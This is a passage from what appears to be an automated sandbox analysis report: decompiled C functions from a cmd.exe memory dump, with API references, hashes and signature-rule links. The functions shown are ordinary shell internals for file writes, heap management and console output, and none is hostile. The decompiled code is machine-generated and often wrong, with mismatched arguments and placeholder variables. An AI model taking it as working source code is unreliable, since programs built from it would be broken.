                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: QueryValue$ErrorLastOpen
                                    • String ID:
                                    • API String ID: 4270309053-0
                                    • Opcode ID: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction ID: a53c6d3f8941d9532d4033516e2c3ffa7e9753d75c1f43f1f85f549d2c8fe1c7
                                    • Opcode Fuzzy Hash: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction Fuzzy Hash: E42150B1D0061AEFEF589FD998949EEBABEFF58654B404119EA11F3180DB748D408BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D56AE, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E011D56AE(void* __ecx, intOrPtr __edx, FILETIME* _a4, intOrPtr _a8) {
				struct _OVERLAPPED _v12;
				short _t11;
				void* _t14;
				void* _t17;
				void* _t27;
				FILETIME* _t30;

				_push(__ecx);
				_push(__ecx);
				_t27 = __ecx;
				_t19 =  *((intOrPtr*)(__edx + 0x20));
				_t11 = 0x1a;
				_v12.InternalHigh = _t11;
				if( *((intOrPtr*)(__edx + 0x20)) == 0) {
					_t19 = __edx;
				}
				_t30 = _a4;
				if(_t30 != 0xffffffff) {
					if(E011F84D3(_t19) != 0) {
						_t12 = E011E0178(_t12);
						if(_t12 == 0) {
							_t17 =  &(_v12.InternalHigh);
							__imp___get_osfhandle(_t12);
							_t12 = WriteFile(_t17, _t30, _t17, 1,  &_v12);
						}
					}
					if(_t27 != 0 && ( *(_t27 + 0x1c) & 0x00000080) == 0 && E011E0178(_t12) == 0) {
						_t14 =  *0x11fd55c; // 0x0
						if(_t14 != 3 && _a8 != 0 && _t14 != 2) {
							__imp___get_osfhandle(_a8);
							SetFileTime(_t14, _t30, 0, 0);
						}
					}
					_t11 = E011DDB92(_t30);
				}
				 *0x11fd56c =  *0x11fd56c + 1;
				return _t11;
			}









                                    0x011d56b3
                                    0x011d56b4
                                    0x011d56b9
                                    0x011d56bb
                                    0x011d56be
                                    0x011d56bf
                                    0x011d56c5
                                    0x011d56e1
                                    0x011d56e1
                                    0x011d56c7
                                    0x011d56cd
                                    0x011e9666
                                    0x011e966a
                                    0x011e9671
                                    0x011e967a
                                    0x011e967f
                                    0x011e9687
                                    0x011e9687
                                    0x011e9671
                                    0x011e968f
                                    0x011e96a2
                                    0x011e96aa
                                    0x011e96bf
                                    0x011e96c7
                                    0x011e96c7
                                    0x011e96aa
                                    0x011e96cf
                                    0x011e96cf
                                    0x011d56d3
                                    0x011d56de

                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction ID: cfc303fd70615c32d237e95fe4f00c6868202794dbac1804ea7544138eead1f6
                                    • Opcode Fuzzy Hash: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction Fuzzy Hash: D8110831A00B0CABDF2D9B98A82CBBE7BA9DB49328F14411AF911D70D0DB70D940CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB91D, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E011FB91D(void* __ecx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t30;
				WCHAR* _t31;
				int _t32;
				char _t34;
				void* _t40;
				void* _t42;
				signed int _t43;

				_t18 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t18 ^ _t43;
				_v28 = _v28 & 0x00000000;
				_t34 = 1;
				_v20 = 0x104;
				_t42 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t30 = _v28;
					if(_t30 == 0) {
						_t30 =  &_v548;
					}
					__imp__GetVolumePathNameW(_t42, _t30, _v20);
					if(_t30 == 0) {
						L8:
						_t34 = 0;
					} else {
						_t31 = _v28;
						if(_t31 == 0) {
							_t31 =  &_v548;
						}
						_t32 = GetDriveTypeW(_t31);
						if(_t32 == 0 || _t32 == 4) {
							goto L8;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t34, _t34, _v8 ^ _t43, _t40, 0x104, _t42, _v28);
			}



















                                    0x011fb928
                                    0x011fb92f
                                    0x011fb932
                                    0x011fb949
                                    0x011fb94a
                                    0x011fb94e
                                    0x011fb950
                                    0x011fb953
                                    0x011fb979
                                    0x011fb97b
                                    0x011fb980
                                    0x011fb982
                                    0x011fb982
                                    0x011fb98d
                                    0x011fb995
                                    0x011fb9b4
                                    0x011fb9b4
                                    0x011fb997
                                    0x011fb997
                                    0x011fb99c
                                    0x011fb99e
                                    0x011fb99e
                                    0x011fb9a5
                                    0x011fb9ad
                                    0x00000000
                                    0x00000000
                                    0x011fb9ad
                                    0x011fb995
                                    0x011fb9b9
                                    0x011fb9d2

                                    APIs
                                    • memset.MSVCRT ref: 011FB953
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 011FB98D
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB9A5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FB9B9
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DriveNamePathTypeVolume
                                    • String ID:
                                    • API String ID: 1029679093-0
                                    • Opcode ID: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction ID: e7cc721ea439e4f1ce3fc2d05b13b0f85f9db091b48783af27da552c08689174
                                    • Opcode Fuzzy Hash: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction Fuzzy Hash: 72115471A04109ABDF24DAE9EC89BBFBBB8FB54348F48006DA614D3141EB34DA44C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F916C, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E011F916C(void* __ecx, long __edx, DWORD* _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v8;
				void* _t6;
				int _t7;
				void* _t14;
				DWORD* _t15;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t31;
				void* _t35;

				_t15 = _a4;
				_t6 =  &_v8;
				_t31 = 0;
				_t28 = __ecx;
				__imp___get_osfhandle(0, _t27, _t30, _t14, __ecx, __ecx);
				_t7 = WriteFile(_t6, __ecx, __edx, _t15, _t6);
				if(_t7 == 0 || _t15 != _v8) {
					L3:
					 *0x1213cf0 = GetLastError();
					E011DDB92(_a12);
					if(E011E0178(E011DDB92(_t28)) == 0) {
						DeleteFileW(_a8);
					} else {
						_t31 = 0x1d;
					}
					 *0x11fd5cc =  *0x11fd5cc & 0x00000000;
					_t22 =  *0x1213cf0;
					if( *0x1213cf0 == 0) {
						_t22 = 0x70;
						 *0x1213cf0 = _t22;
					}
					if( *0x11fd544 == 0) {
						if(_t31 == 0) {
							E011F985A(_t22);
						}
					} else {
						_t31 = 0;
					}
					_t7 = E011F85E9(_t31, 1);
					goto L13;
				} else {
					_t35 =  *0x11fd544 - _t31; // 0x0
					if(_t35 == 0) {
						L13:
						return _t7;
					}
					goto L3;
				}
			}













                                    0x011f9174
                                    0x011f9177
                                    0x011f917c
                                    0x011f917e
                                    0x011f9185
                                    0x011f918d
                                    0x011f9195
                                    0x011f91a4
                                    0x011f91ad
                                    0x011f91b2
                                    0x011f91c7
                                    0x011f91d1
                                    0x011f91c9
                                    0x011f91cb
                                    0x011f91cb
                                    0x011f91d7
                                    0x011f91de
                                    0x011f91e6
                                    0x011f91ea
                                    0x011f91eb
                                    0x011f91eb
                                    0x011f91f8
                                    0x011f9200
                                    0x011f9202
                                    0x011f9202
                                    0x011f91fa
                                    0x011f91fa
                                    0x011f91fa
                                    0x011f920c
                                    0x00000000
                                    0x011f919c
                                    0x011f919c
                                    0x011f91a2
                                    0x011f9211
                                    0x011f9217
                                    0x011f9217
                                    0x00000000
                                    0x011f91a2

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F9185
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F918D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011F91A4
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011F91D1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                    • String ID:
                                    • API String ID: 2448200120-0
                                    • Opcode ID: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction ID: 499c3324025d5890067361c84f672c64880c49859f969036f7d5f2ee01bbea58
                                    • Opcode Fuzzy Hash: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction Fuzzy Hash: ED11B2316042199BEF3DEB95F85CB7E7769EB9572DF00402DFA0482184DF709840C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAC30, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011DAC30(void* __ecx) {
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				intOrPtr* _t18;
				short _t30;
				signed short _t32;
				void* _t38;
				void* _t42;

				if(__ecx != 0) {
					_t16 =  *(__ecx + 0x14);
					if(_t16 != 0) {
						_t16 = _t16 - 1;
						 *(__ecx + 0x14) = _t16;
						_t42 =  *(__ecx + 0x90 + _t16 * 4);
						 *(__ecx + 0x90 + _t16 * 4) =  *(__ecx + 0x90 + _t16 * 4) & 0x00000000;
						if(_t42 != 0) {
							_t41 =  *_t42;
							_t17 =  *( *_t42) & 0x0000ffff;
							if(_t17 >= 0x61) {
								__eflags = _t17 - 0x7a;
								if(__eflags > 0) {
									goto L4;
								}
								_t32 = _t17 + 0xffffffe0 & 0x0000ffff;
								L5:
								_t18 =  *0x1213cb8;
								if(_t18 == 0) {
									_t18 = 0x1213ab0;
								}
								if( *_t18 != _t32) {
									E011F93E2((_t32 & 0x0000ffff) - 0x40, _t38);
									_t41 =  *_t42;
								}
								E011E33FC(_t30, _t41, 1, _t41, _t42, 1);
								RtlFreeHeap(GetProcessHeap(), 0,  *_t42);
								E011DACFD( *((intOrPtr*)(_t42 + 4)));
								E011DACD5( *((intOrPtr*)(_t42 + 4)));
								 *0x1213cc9 =  *((intOrPtr*)(_t42 + 8));
								 *0x1213cc8 =  *((intOrPtr*)(_t42 + 9));
								return RtlFreeHeap(GetProcessHeap(), 0, _t42);
							}
							L4:
							_t32 = _t17;
							goto L5;
						}
					}
				}
				return _t16;
			}












                                    0x011dac36
                                    0x011dac3c
                                    0x011dac41
                                    0x011dac47
                                    0x011dac48
                                    0x011dac4b
                                    0x011dac52
                                    0x011dac5c
                                    0x011dac5e
                                    0x011dac60
                                    0x011dac66
                                    0x011f1204
                                    0x011f1207
                                    0x00000000
                                    0x00000000
                                    0x011f1210
                                    0x011dac6e
                                    0x011dac6e
                                    0x011dac75
                                    0x011dacce
                                    0x011dacce
                                    0x011dac7a
                                    0x011f121e
                                    0x011f1223
                                    0x011f1223
                                    0x011dac85
                                    0x011dac95
                                    0x011dac9e
                                    0x011daca6
                                    0x011dacae
                                    0x011dacb9
                                    0x00000000
                                    0x011dacc5
                                    0x011dac6c
                                    0x011dac6c
                                    0x00000000
                                    0x011dac6c
                                    0x011dac5c
                                    0x011dac41
                                    0x011daccd

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DAC8E
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DAC95
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACBE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACC5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction ID: 6348abebaca485cdcab2db9325b7d55d81ac5ea499bb28ba1979bbe6f0d0d36c
                                    • Opcode Fuzzy Hash: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction Fuzzy Hash: 701190316042409BDB28EF69B4587767FA5BF55238F24444DE58A8B285CB20D882CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5D59, Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E5D59(void* __ebx) {
				intOrPtr _t4;
				void* _t15;
				intOrPtr* _t16;
				void* _t23;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_t15 = __ebx;
				_t28 =  *0x1213cb8;
				_t16 = _t28;
				if(_t28 == 0) {
					_t16 = 0x1213ab0;
				}
				_t23 = _t16 + 2;
				do {
					_t4 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t4 != 0);
				_t27 = (_t16 - _t23 >> 1) + 1;
				if(_t28 == 0) {
					_t28 = 0x1213ab0;
				}
				E011E36CB(_t15, _t28,  *0x1213cc0, 0);
				_t29 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				if(_t29 == 0) {
					L11:
					return 0;
				} else {
					_t20 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t20 = 0x1213ab0;
					}
					E011E1040(_t29, _t27, _t20);
					if(E011E5DEA(_t29) == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t29);
						goto L11;
					} else {
						return 1;
					}
				}
			}










                                    0x011e5d59
                                    0x011e5d5c
                                    0x011e5d62
                                    0x011e5d67
                                    0x011ef361
                                    0x011ef361
                                    0x011e5d6d
                                    0x011e5d72
                                    0x011e5d72
                                    0x011e5d75
                                    0x011e5d78
                                    0x011e5d81
                                    0x011e5d86
                                    0x011e5dd8
                                    0x011e5dd8
                                    0x011e5d92
                                    0x011e5daa
                                    0x011e5dae
                                    0x011e5de6
                                    0x00000000
                                    0x011e5db0
                                    0x011e5db0
                                    0x011e5db8
                                    0x011e5ddf
                                    0x011e5ddf
                                    0x011e5dbf
                                    0x011e5dcd
                                    0x011ef375
                                    0x00000000
                                    0x011e5dd3
                                    0x00000000
                                    0x011e5dd3
                                    0x011e5dcd

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 011E5D9D
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E5DA4
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess
                                    • String ID:
                                    • API String ID: 1617791916-0
                                    • Opcode ID: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction ID: 0f5a41989acc2c0d18a20331048d3f20a51405a75de3d5e67516c39bbb082f85
                                    • Opcode Fuzzy Hash: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction Fuzzy Hash: D7114C39A04D1157CA7CEA99641CBBF2BD7FF94A28B1A0148ED075B24CCF228C438791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0100, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E011E0100(void* __ecx, void* __edx) {
				void* _t12;
				long _t15;
				void* _t16;
				void** _t17;
				void* _t19;
				void* _t20;

				_t16 = __ecx;
				_t15 = __edx + 8;
				_t20 = __ecx - 8;
				if(_t15 < __edx) {
					L12:
					_push(0);
					_push(8);
					E011DC5A2(_t16);
					return 0;
				}
				_t19 = HeapReAlloc(GetProcessHeap(), 0, _t20, _t15);
				if(_t19 == 0) {
					goto L12;
				}
				 *_t19 = _t15;
				HeapSize(GetProcessHeap(), 0, _t19);
				if(_t19 == _t20) {
					L3:
					_t3 = _t19 + 8; // 0x8
					return _t3;
				}
				_t12 =  *0x1213cdc;
				if(_t12 != _t20) {
					if(_t12 == 0) {
						goto L3;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						_t17 = _t12 + 4;
						_t12 =  *_t17;
						if(_t12 == _t20) {
							break;
						}
						if(_t12 != 0) {
							continue;
						}
						goto L3;
					}
					 *_t17 = _t19;
					goto L3;
				}
				 *0x1213cdc = _t19;
				_t4 = _t19 + 8; // 0x8
				return _t4;
			}









                                    0x011e0100
                                    0x011e0104
                                    0x011e0107
                                    0x011e010d
                                    0x011ec9ea
                                    0x011ec9ea
                                    0x011ec9ec
                                    0x011ec9ee
                                    0x00000000
                                    0x011ec9f6
                                    0x011e0124
                                    0x011e0128
                                    0x00000000
                                    0x00000000
                                    0x011e0131
                                    0x011e013a
                                    0x011e0142
                                    0x011e0144
                                    0x011e0144
                                    0x00000000
                                    0x011e0144
                                    0x011e014b
                                    0x011e0152
                                    0x011e0163
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e0165
                                    0x011e0165
                                    0x011e0165
                                    0x011e0168
                                    0x011e016c
                                    0x00000000
                                    0x00000000
                                    0x011e0170
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e0172
                                    0x011e0174
                                    0x00000000
                                    0x011e0174
                                    0x011e0154
                                    0x011e015a
                                    0x011e0160

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,011DEBC3), ref: 011E0117
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E011E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011E0133
                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E013A
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocSize
                                    • String ID:
                                    • API String ID: 2549470565-0
                                    • Opcode ID: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction ID: e2a7a4aa19491613736b4a0f1eaa3d6b69ab3a3bdc62ec0be1301525b8a0adc7
                                    • Opcode Fuzzy Hash: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction Fuzzy Hash: 9601F5723006019BDB25DB99FC8CF9A7BE9FB98765F250024F60ACA040DF71D884CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F7DF1, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E011F7DF1(unsigned int __ecx, void* __esi) {
				signed int _v8;
				signed short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _COORD _v36;
				long _v40;
				void* __ebx;
				signed int _t11;
				void* _t20;
				int _t28;
				void* _t34;
				void* _t35;
				void* _t37;
				signed int _t38;

				_t36 = __esi;
				_t11 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t11 ^ _t38;
				_t28 = __ecx;
				if(((__ecx >> 0x00000004 ^ __ecx) & 0x0000000f) != 0) {
					_push(__esi);
					_t37 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t37,  &_v32) == 0) {
						_t20 = 1;
					} else {
						_v36 = 0;
						FillConsoleOutputAttribute(_t37, _t28, _v32.dwSize * _v30, _v36,  &_v40);
						SetConsoleTextAttribute(_t37, _t28);
						_t20 = 0;
					}
					_pop(_t36);
				} else {
					_t20 = 1;
				}
				return E011E6FD0(_t20, _t28, _v8 ^ _t38, _t34, _t35, _t36);
			}
















                                    0x011f7df1
                                    0x011f7df9
                                    0x011f7e00
                                    0x011f7e04
                                    0x011f7e0f
                                    0x011f7e16
                                    0x011f7e1f
                                    0x011f7e2e
                                    0x011f7e5e
                                    0x011f7e30
                                    0x011f7e36
                                    0x011f7e4a
                                    0x011f7e52
                                    0x011f7e58
                                    0x011f7e58
                                    0x011f7e5f
                                    0x011f7e11
                                    0x011f7e13
                                    0x011f7e13
                                    0x011f7e6e

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E19
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E26
                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E4A
                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E52
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                    • String ID:
                                    • API String ID: 1033415088-0
                                    • Opcode ID: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction ID: 2329a96a56c81efd7d0546561d12292f04eb504c50e147800c7a24bf01edc832
                                    • Opcode Fuzzy Hash: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction Fuzzy Hash: C801F532A04128AF8F18DFB4AC489FFB7FCEF1D214B00012AF916D2180EB249E41C3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6D00, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E6D00() {
				signed int _t10;
				intOrPtr* _t13;
				intOrPtr* _t14;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t25;

				_t25 =  *0x11d0000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0x11d003c; // 0xf8
					__eflags =  *((intOrPtr*)(_t19 + 0x11d0000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0x11d0000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0x11d0018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0x11d0074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0x11d0074)) > 0xe) {
								__eflags =  *(_t19 + 0x11d00e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0x11d0084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0x11d0084)) > 0xe) {
									__eflags =  *(_t19 + 0x11d00f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0x11fd1b0 = _t10;
				__set_app_type(E011E738E(1));
				 *0x11fd518 =  *0x11fd518 | 0xffffffff;
				 *0x11fd51c =  *0x11fd51c | 0xffffffff;
				_t13 = __p__fmode();
				_t22 =  *0x11fd4e0; // 0x0
				 *_t13 = _t22;
				_t14 = __p__commode();
				_t23 =  *0x11fd4d4; // 0x0
				 *_t14 = _t23;
				_t15 = E011E75B0();
				if( *0x11fd0b0 == 0) {
					__setusermatherr(E011E75B0);
				}
				E011E75B3(_t15);
				return 0;
			}












                                    0x011e6d05
                                    0x011e6d0c
                                    0x011e6d12
                                    0x011e6d18
                                    0x011e6d22
                                    0x00000000
                                    0x011e6d24
                                    0x011e6d24
                                    0x011e6d24
                                    0x011e6d2b
                                    0x011e6d30
                                    0x011e6d4c
                                    0x011e6d4e
                                    0x011e6d55
                                    0x011e6d57
                                    0x00000000
                                    0x011e6d57
                                    0x011e6d32
                                    0x011e6d32
                                    0x011e6d37
                                    0x00000000
                                    0x011e6d39
                                    0x011e6d39
                                    0x011e6d3b
                                    0x011e6d42
                                    0x011e6d44
                                    0x011e6d5d
                                    0x011e6d5d
                                    0x011e6d5d
                                    0x011e6d5d
                                    0x011e6d5d
                                    0x011e6d42
                                    0x011e6d37
                                    0x011e6d30
                                    0x011e6d0e
                                    0x011e6d0e
                                    0x011e6d0e
                                    0x011e6d0e
                                    0x011e6d62
                                    0x011e6d6d
                                    0x011e6d73
                                    0x011e6d7a
                                    0x011e6d83
                                    0x011e6d89
                                    0x011e6d8f
                                    0x011e6d91
                                    0x011e6d97
                                    0x011e6d9d
                                    0x011e6d9f
                                    0x011e6dab
                                    0x011e6db2
                                    0x011e6db8
                                    0x011e6db9
                                    0x011e6dc0

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                    • String ID:
                                    • API String ID: 1063105408-0
                                    • Opcode ID: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction ID: 550b7e3ba0860eacf3b7868c957b2cfc2887db86a85fd678a6cf72e94b96051c
